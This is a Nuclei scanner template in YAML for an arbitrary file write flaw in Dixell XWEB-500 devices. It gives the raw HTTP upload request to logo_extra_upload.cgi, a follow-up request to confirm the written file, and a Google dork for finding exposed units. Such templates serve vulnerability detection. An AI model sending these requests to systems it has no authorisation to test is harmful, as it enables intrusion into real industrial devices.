nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml

37 lines
774 B
YAML
Raw Normal View History

id: dixell-xweb500-filewrite
info:
name: Dixell XWEB-500 - Arbitrary File Write
author: hackerarpan
severity: critical
reference:
- https://www.exploit-db.com/exploits/50639
metadata:
google-dork: inurl:"xweb500.cgi"
tags: lfw,iot,dixell,xweb500
requests:
- raw:
- |
POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{randstr}}.txt
dixell-xweb500-filewrite
- |
GET /logo/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_2, "dixell-xweb500-filewrite")'
- type: status
status:
- 200